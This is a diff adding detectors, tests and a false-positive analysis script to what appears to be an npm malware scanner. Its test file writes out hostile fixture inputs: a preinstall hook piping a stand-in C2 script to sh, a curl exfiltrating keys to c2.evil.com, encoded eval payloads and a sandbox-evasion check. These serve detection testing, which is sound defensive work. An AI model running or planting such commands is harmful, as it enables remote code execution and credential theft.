@lateos/npm-scan 0.18.3 → 1.0.0

package/backend/detectors/tier1-obfuscation-heuristics.js

@@ -0,0 +1,156 @@
+import { KNOWN_REPUTABLE_PACKAGES } from '../policy.js';
+import { shannonEntropy, isMinified } from './lib/entropy-analyzer.js';
+import { detectPatterns } from './lib/ast-patterns.js';
+
+const LIFECYCLE_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
+const ENTROPY_THRESHOLD = 5.3;
+const PAYLOAD_SIZE_THRESHOLD = 100000;
+
+function analyze(code, label) {
+  if (!code || code.length < 20) return null;
+
+  const entropy = shannonEntropy(code);
+  const patterns = detectPatterns(code);
+  const minified = isMinified(code);
+  const payloadSize = code.length;
+
+  let score = 0;
+  let flags = [];
+
+  if (entropy > ENTROPY_THRESHOLD) {
+    score += 35;
+    flags.push(`Entropy ${entropy} exceeds threshold ${ENTROPY_THRESHOLD}`);
+  }
+
+  if (entropy > 5.8) {
+    score += 15;
+    flags.push(`High entropy ${entropy} — strong obfuscation indicator`);
+  }
+
+  const patternCount = patterns.length;
+  if (patternCount >= 3) {
+    score += 30;
+    flags.push(`${patternCount} obfuscation patterns detected`);
+  } else if (patternCount >= 1) {
+    score += 20;
+    flags.push(`${patternCount} obfuscation patterns detected`);
+  }
+
+  if (minified) {
+    score += 10;
+    flags.push('Minified code — reduced readability');
+  }
+
+  if (payloadSize > PAYLOAD_SIZE_THRESHOLD) {
+    score += 15;
+    flags.push(`Payload size ${payloadSize} bytes exceeds ${PAYLOAD_SIZE_THRESHOLD} byte threshold`);
+  }
+
+  if (patterns.includes('XOR_CIPHER') && patterns.length >= 2) {
+    score += 10;
+    flags.push('ctf-scramble-v2 style XOR cipher detected');
+  }
+
+  if (patterns.includes('EVAL_USAGE') && entropy > 5.0) {
+    score += 15;
+    flags.push('eval() with high-entropy code');
+  }
+
+  score = Math.max(0, Math.min(100, score));
+
+  if (score < 40) return null;
+
+  return {
+    flagged: true,
+    confidenceScore: score,
+    confidence: score >= 80 ? 'HIGH' : score >= 60 ? 'MEDIUM' : 'LOW',
+    entropy,
+    patterns,
+    patternCount,
+    payloadSize,
+    flags,
+  };
+}
+
+function severityLabel(sc) {
+  if (sc >= 90) return 'critical';
+  if (sc >= 70) return 'high';
+  if (sc >= 50) return 'medium';
+  return 'low';
+}
+
+function confidenceLabel(sc) {
+  if (sc >= 80) return 'HIGH';
+  if (sc >= 60) return 'MEDIUM';
+  return 'LOW';
+}
+
+export const name = 'tier1-obfuscation-heuristics';
+
+export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
+  const pkgName = pkgJson?.name;
+  if (pkgName && KNOWN_REPUTABLE_PACKAGES.has(pkgName)) return [];
+
+  const findings = [];
+  const scripts = pkgJson?.scripts || {};
+
+  for (const [hookName, scriptContent] of Object.entries(scripts)) {
+    if (!LIFECYCLE_SCRIPTS.includes(hookName)) continue;
+    const result = analyze(scriptContent, hookName);
+    if (!result) continue;
+
+    findings.push({
+      detector: 'tier1-obfuscation-heuristics',
+      id: 'TIER1-OBFUSCATION-HEURISTICS',
+      severity: severityLabel(result.confidenceScore),
+      confidence: confidenceLabel(result.confidenceScore),
+      confidenceScore: result.confidenceScore,
+      subtype: 'obfuscated_lifecycle_script',
+      message: `Obfuscation detected in ${hookName} script: ${result.flags[0] || 'obfuscation patterns found'}`,
+      evidence: [
+        `script: ${hookName}`,
+        `entropy: ${result.entropy}`,
+        `patterns: ${result.patterns.join(', ') || 'none'}`,
+        `pattern_count: ${result.patternCount}`,
+        `payload_size_bytes: ${result.payloadSize}`,
+        ...result.flags,
+      ],
+      crossFiles: [],
+      locations: [{ file: 'package.json', line: 3, column: 10 }],
+      reference: 'Mini Shai-Hulud obfuscation campaign',
+    });
+  }
+
+  for (const f of jsFiles || []) {
+    const content = f.content || '';
+    if (content.length < 100) continue;
+
+    const result = analyze(content, f.path || 'unknown.js');
+    if (!result) continue;
+
+    if (result.confidenceScore < 50) continue;
+
+    findings.push({
+      detector: 'tier1-obfuscation-heuristics',
+      id: 'TIER1-OBFUSCATION-HEURISTICS',
+      severity: severityLabel(result.confidenceScore),
+      confidence: confidenceLabel(result.confidenceScore),
+      confidenceScore: result.confidenceScore,
+      subtype: 'obfuscated_js_file',
+      message: `Obfuscation detected in ${f.path || 'file'}: ${result.flags[0] || 'obfuscation patterns found'}`,
+      evidence: [
+        `file: ${f.path || 'unknown.js'}`,
+        `entropy: ${result.entropy}`,
+        `patterns: ${result.patterns.join(', ') || 'none'}`,
+        `pattern_count: ${result.patternCount}`,
+        `payload_size_bytes: ${result.payloadSize}`,
+        ...result.flags,
+      ],
+      crossFiles: [],
+      locations: [{ file: f.path || 'unknown.js', line: 0, column: 0 }],
+      reference: 'Mini Shai-Hulud obfuscation campaign',
+    });
+  }
+
+  return findings;
+}

package/backend/detectors/tier1-slsa-attestation.js

@@ -0,0 +1,12 @@
+// D8: SLSA Attestation Mismatch Detector
+// TODO: Implement after npm SLSA attestation API stabilizes
+// Blockers:
+//   - npm registry SLSA attestation API not yet widely adopted (as of June 2026)
+//   - Requires npm auth token to fetch provenance
+//   - May have rate limits
+
+export const name = 'tier1-slsa-attestation';
+
+export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
+  return [];
+}

package/backend/detectors/tier1-version-anomaly.js

@@ -0,0 +1,187 @@
+import { KNOWN_REPUTABLE_PACKAGES } from '../policy.js';
+
+const SENTINEL_PATTERNS = new Set(['99.99.99', '11.11.11', '10.10.10']);
+
+function parseVersion(v) {
+  if (!v || typeof v !== 'string') return null;
+  const parts = v.split('.');
+  if (parts.length !== 3) return null;
+  const [major, minor, patch] = parts.map(Number);
+  if (isNaN(major) || isNaN(minor) || isNaN(patch)) return null;
+  return { major, minor, patch, full: v };
+}
+
+function versionScore(v) {
+  return v.major * 10000 + v.minor * 100 + v.patch;
+}
+
+function extractVersions(registryMeta) {
+  if (Array.isArray(registryMeta)) {
+    return registryMeta.map(v => parseVersion(v)).filter(Boolean);
+  }
+  if (registryMeta && typeof registryMeta === 'object') {
+    const versions = registryMeta.versions || registryMeta.time;
+    if (versions && typeof versions === 'object') {
+      return Object.keys(versions).map(v => parseVersion(v)).filter(Boolean);
+    }
+  }
+  return [];
+}
+
+function computeStats(scores) {
+  if (scores.length < 2) return null;
+  const mean = scores.reduce((s, v) => s + v, 0) / scores.length;
+  const variance = scores.reduce((s, v) => s + (v - mean) ** 2, 0) / scores.length;
+  const stddev = Math.sqrt(variance);
+  return { mean, stddev, max: Math.max(...scores), min: Math.min(...scores) };
+}
+
+export function analyzeAnomaly(packageName, versionStr, versionHistory) {
+  const current = parseVersion(versionStr);
+  if (!current) return null;
+
+  const historical = extractVersions(versionHistory);
+  const currentScore = versionScore(current);
+  const isSentinel = SENTINEL_PATTERNS.has(versionStr);
+
+  if (!historical || historical.length < 2) {
+    if (isSentinel) {
+      return {
+        flagged: true,
+        confidenceScore: 60,
+        confidence: 'MEDIUM',
+        zScore: null,
+        baselineMax: 'unknown',
+        baselineMean: 'unknown',
+        reason: `Version ${versionStr} matches known dependency confusion pattern (no registry data to confirm)`,
+        attackPattern: 'SENTINEL_PATTERN_ONLY',
+      };
+    }
+    return null;
+  }
+
+  const scores = historical.map(versionScore).sort((a, b) => a - b);
+  const recentScores = scores.slice(-50);
+  if (recentScores.length < 2) {
+    if (isSentinel) {
+      return {
+        flagged: true,
+        confidenceScore: 60,
+        confidence: 'MEDIUM',
+        zScore: null,
+        baselineMax: 'unknown',
+        baselineMean: 'unknown',
+        reason: `Version ${versionStr} matches known dependency confusion pattern (insufficient history)`,
+        attackPattern: 'SENTINEL_PATTERN_ONLY',
+      };
+    }
+    return null;
+  }
+
+  const stats = computeStats(recentScores);
+  if (!stats) return null;
+
+  const zScore = stats.stddev > 0 ? (currentScore - stats.mean) / stats.stddev : 0;
+  const baselineMaxVer = historical.find(v => versionScore(v) === stats.max)?.full || 'unknown';
+  const baselineMeanVal = (stats.mean / 10000).toFixed(1);
+  const prevMaxMajor = Math.floor(stats.max / 10000);
+  const isNormalMajorBump = current.major === prevMaxMajor + 1 && current.minor === 0 && current.patch === 0;
+  const isReasonableVersion = current.major <= prevMaxMajor + 2 && current.major >= Math.floor(stats.min / 10000);
+  const ratio = stats.max > 0 ? currentScore / stats.max : 0;
+
+  let flagged = false;
+  let confidenceScore = 0;
+  let attackPattern = '';
+  let reason = '';
+
+  if (isSentinel) {
+    flagged = true;
+    confidenceScore = 92;
+    attackPattern = 'DEPENDENCY_CONFUSION_HIGH_VERSION';
+    reason = `Version ${versionStr} matches known dependency confusion sentinel pattern; z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal}`;
+  } else if (zScore > 10 && !isNormalMajorBump) {
+    flagged = true;
+    confidenceScore = 90;
+    attackPattern = 'Z_SCORE_EXTREME';
+    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — extreme anomaly`;
+  } else if (zScore > 5 && !isNormalMajorBump) {
+    flagged = true;
+    confidenceScore = 85;
+    attackPattern = 'Z_SCORE_ANOMALY';
+    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — strong anomaly`;
+  } else if (zScore > 3 && !isNormalMajorBump) {
+    flagged = true;
+    confidenceScore = 72;
+    attackPattern = 'Z_SCORE_ELEVATED';
+    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — elevated anomaly`;
+  } else if (ratio > 10 && !isNormalMajorBump) {
+    flagged = true;
+    confidenceScore = 75;
+    attackPattern = 'MAJOR_VERSION_JUMP';
+    reason = `Version ${versionStr} exceeds max historical version (${baselineMaxVer}) by factor of ${ratio.toFixed(1)}`;
+  } else if (zScore > 2 && !isReasonableVersion) {
+    flagged = true;
+    confidenceScore = 55;
+    attackPattern = 'SUSPICIOUS_VERSION';
+    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} and is outside expected version range`;
+  }
+
+  if (!flagged) return null;
+
+  return {
+    flagged,
+    confidenceScore: Math.min(100, confidenceScore),
+    confidence: confidenceScore >= 80 ? 'HIGH' : confidenceScore >= 60 ? 'MEDIUM' : 'LOW',
+    zScore: Math.round(zScore * 10) / 10,
+    baselineMax: baselineMaxVer,
+    baselineMean: baselineMeanVal,
+    reason,
+    attackPattern,
+  };
+}
+
+function severityLabel(sc) {
+  if (sc >= 90) return 'critical';
+  if (sc >= 70) return 'high';
+  if (sc >= 50) return 'medium';
+  return 'low';
+}
+
+function confidenceLabel(sc) {
+  if (sc >= 80) return 'HIGH';
+  if (sc >= 60) return 'MEDIUM';
+  return 'LOW';
+}
+
+export const name = 'tier1-version-anomaly';
+
+export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
+  const pkgName = pkgJson?.name;
+  const version = pkgJson?.version;
+
+  if (!pkgName || !version) return [];
+  if (pkgName && KNOWN_REPUTABLE_PACKAGES.has(pkgName)) return [];
+
+  const result = analyzeAnomaly(pkgName, version, registryMeta);
+  if (!result) return [];
+
+  return [{
+    detector: 'tier1-version-anomaly',
+    id: 'TIER1-VERSION-ANOMALY',
+    severity: severityLabel(result.confidenceScore),
+    confidence: confidenceLabel(result.confidenceScore),
+    confidenceScore: result.confidenceScore,
+    subtype: result.attackPattern.toLowerCase(),
+    message: `Version anomaly detected in "${pkgName}": ${result.reason}`,
+    evidence: [
+      `version: ${version}`,
+      `baseline_max: ${result.baselineMax}`,
+      `baseline_mean: ${result.baselineMean}`,
+      `z_score: ${result.zScore ?? 'N/A'}`,
+      `attack_pattern: ${result.attackPattern}`,
+    ],
+    crossFiles: [],
+    locations: [{ file: 'package.json', line: 3, column: 10 }],
+    reference: '176-package dependency confusion campaign',
+  }];
+}

package/backend/detectors.test.js

@@ -0,0 +1,88 @@
+import { test } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+test('detectors runAll empty', async () => {
+  const findings = await detectors.runAll({});
+  assert.equal(findings.length, 0);
+});
+
+test('ATK-001 detects preinstall', async () => {
+  const pkg = { scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' } };
+  const findings = await detectors.runAll(pkg);
+  assert(findings.some(f => f.id === 'ATK-001'), 'Expected ATK-001');
+});
+
+test('ATK-002 detects eval+decode', async () => {
+  const files = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-002'), 'Expected ATK-002');
+});
+
+test('ATK-003 detects cred env vars', async () => {
+  const files = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-003'), 'Expected ATK-003');
+});
+
+test('ATK-004 detects editor persistence', async () => {
+  const files = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-004'), 'Expected ATK-004');
+});
+
+test('ATK-005 detects network exfil', async () => {
+  const files = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-005'), 'Expected ATK-005');
+});
+
+test('ATK-006 detects dep confusion', async () => {
+  const pkg = { dependencies: { 'acorn-squatter': '1.0.0' } };
+  const findings = await detectors.runAll(pkg);
+  assert(findings.some(f => f.id === 'ATK-006'), 'Expected ATK-006');
+});
+
+test('ATK-007 detects typosquatting', async () => {
+  const pkg = { dependencies: { 'lodash': 'latest', 'loddsh': '1.0.0' } };
+  const findings = await detectors.runAll(pkg);
+  assert(findings.some(f => f.id === 'ATK-007'), 'Expected ATK-007 for loddsh');
+});
+
+test('ATK-008 detects tarball tampering', async () => {
+  const pkg = { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-evil.git' } };
+  const findings = await detectors.runAll(pkg);
+  assert(findings.some(f => f.id === 'ATK-008'), 'Expected ATK-008');
+});
+
+test('ATK-009 detects CI env trigger', async () => {
+  const files = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-009'), 'Expected ATK-009');
+});
+
+test('ATK-010 detects sandbox evasion', async () => {
+  const files = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-010'), 'Expected ATK-010');
+});
+
+test('ATK-011 detects transitive propagation', async () => {
+  const files = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-011'), 'Expected ATK-011');
+});
+
+test('no false positives on clean package', async () => {
+  const pkg = { name: 'test-pkg', version: '1.0.0', scripts: { test: 'node test.js' }, dependencies: { 'express': '4.0.0' } };
+  const files = [{ path: 'index.js', content: 'module.exports = function() { return 42 }' }];
+  const findings = await detectors.runAll(pkg, files);
+  const highCrit = findings.filter(f => f.severity === 'high' || f.severity === 'critical');
+  assert.equal(highCrit.length, 0, `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`);
+});
+
+test('all 11 ATK IDs present', async () => {
+  const expected = ['ATK-001', 'ATK-002', 'ATK-003', 'ATK-004', 'ATK-005', 'ATK-006', 'ATK-007', 'ATK-008', 'ATK-009', 'ATK-010', 'ATK-011'];
+  const exports = Object.keys(detectors);
+  assert.equal(exports.includes('runAll'), true);
+});

package/backend/scripts/analyze-false-positives.js

@@ -0,0 +1,146 @@
+#!/usr/bin/env node
+import { readFileSync, existsSync, writeFileSync } from 'node:fs';
+import { resolve } from 'node:path';
+
+function analyzeFalsePositives(fpFile) {
+  const analysis = {
+    total_fps: 0,
+    scanned_packages: 0,
+    fp_rate: '0%',
+    detectors: {},
+    high_fp_detectors: [],
+    recommendations: [],
+    per_package: {},
+  };
+
+  const absPath = resolve(fpFile);
+  if (!existsSync(absPath)) {
+    console.error(`[ERROR] False positives file not found: ${absPath}`);
+    process.exit(1);
+  }
+
+  const text = readFileSync(absPath, 'utf-8');
+  const lines = text.split('\n').filter(l => l.trim());
+
+  for (const line of lines) {
+    const fp = JSON.parse(line);
+    analysis.total_fps += 1;
+
+    const detector = fp.detector;
+    if (!analysis.detectors[detector]) {
+      analysis.detectors[detector] = {
+        fp_count: 0,
+        avg_confidence: 0,
+        confidences: [],
+        severities: [],
+        examples: [],
+        unique_packages: new Set(),
+      };
+    }
+
+    analysis.detectors[detector].fp_count += 1;
+    analysis.detectors[detector].confidences.push(fp.confidence);
+    analysis.detectors[detector].severities.push(fp.severity);
+    analysis.detectors[detector].unique_packages.add(fp.package);
+
+    if (analysis.detectors[detector].examples.length < 5) {
+      analysis.detectors[detector].examples.push({
+        package: fp.package,
+        version: fp.version,
+        confidence: fp.confidence,
+        subtype: fp.subtype,
+      });
+    }
+
+    if (!analysis.per_package[fp.package]) {
+      analysis.per_package[fp.package] = [];
+    }
+    analysis.per_package[fp.package].push({
+      detector: fp.detector,
+      confidence: fp.confidence,
+      version: fp.version,
+    });
+  }
+
+  for (const [detectorName, stats] of Object.entries(analysis.detectors)) {
+    stats.avg_confidence = stats.confidences.length > 0
+      ? (stats.confidences.reduce((a, b) => a + b, 0) / stats.confidences.length).toFixed(1)
+      : '0.0';
+    stats.unique_package_count = stats.unique_packages.size;
+    delete stats.unique_packages;
+
+    const fpShare = (stats.fp_count / analysis.total_fps * 100).toFixed(1);
+
+    if (stats.fp_count >= 5) {
+      analysis.high_fp_detectors.push(detectorName);
+      analysis.recommendations.push({
+        detector: detectorName,
+        fp_count: stats.fp_count,
+        unique_packages: stats.unique_package_count,
+        share_of_total_fps: fpShare + '%',
+        avg_confidence: stats.avg_confidence,
+        severity_distribution: stats.severities.reduce((acc, s) => {
+          acc[s] = (acc[s] || 0) + 1;
+          return acc;
+        }, {}),
+        suggested_action: `Increase confidence threshold from current to ${Math.min(100, Math.ceil(parseFloat(stats.avg_confidence)) + 5)}`,
+        examples: stats.examples,
+      });
+    }
+  }
+
+  return analysis;
+}
+
+const fpFile = process.argv[2] || 'false-positives.jsonl';
+
+console.log(`[INFO] Analyzing ${fpFile}...`);
+const analysis = analyzeFalsePositives(fpFile);
+
+console.log('\n=== FALSE POSITIVE ANALYSIS ===');
+console.log(`Total FPs: ${analysis.total_fps}`);
+console.log(`Detectors with FPs: ${Object.keys(analysis.detectors).length}`);
+
+if (analysis.high_fp_detectors.length > 0) {
+  console.log(`\nHigh-FP detectors (>= 5 FPs): ${analysis.high_fp_detectors.join(', ')}`);
+} else {
+  console.log('\nNo high-FP detectors found (all < 5 FPs) — thresholds are well-calibrated');
+}
+
+console.log('\n=== PER-DETECTOR BREAKDOWN ===');
+console.log('Detector                          FPs  UniquePkgs  AvgConf  Top Examples');
+console.log('─'.repeat(90));
+for (const [name, stats] of Object.entries(analysis.detectors).sort(
+  (a, b) => b[1].fp_count - a[1].fp_count
+)) {
+  const dName = name.padEnd(32).slice(0, 32);
+  const examples = stats.examples.slice(0, 2).map(e => e.package).join(', ');
+  console.log(
+    `${dName} ${String(stats.fp_count).padStart(4)} ${String(stats.unique_package_count).padStart(11)} ` +
+    `${stats.avg_confidence.padStart(7)}  ${examples}`
+  );
+}
+
+if (analysis.recommendations.length > 0) {
+  console.log('\n=== RECOMMENDATIONS ===');
+  for (const rec of analysis.recommendations) {
+    console.log(`\n${rec.detector}:`);
+    console.log(`  FPs: ${rec.fp_count} (${rec.share_of_total_fps} of total) across ${rec.unique_packages} unique packages`);
+    console.log(`  Avg confidence: ${rec.avg_confidence}`);
+    console.log(`  Severity breakdown: ${JSON.stringify(rec.severity_distribution)}`);
+    console.log(`  Suggestion: ${rec.suggested_action}`);
+    console.log(`  Examples:`);
+    for (const ex of rec.examples.slice(0, 3)) {
+      console.log(`    ${ex.package}@${ex.version} (${ex.confidence}%) [${ex.subtype}]`);
+    }
+  }
+} else {
+  console.log('\n=== RECOMMENDATIONS ===');
+  console.log('No threshold adjustments needed — FP rates are within acceptable bounds.');
+}
+
+const outPath = resolve('fp-analysis.json');
+writeFileSync(outPath, JSON.stringify(analysis, null, 2), 'utf-8');
+console.log(`\n[INFO] Full analysis written to ${outPath}`);
+
+process.exit(0);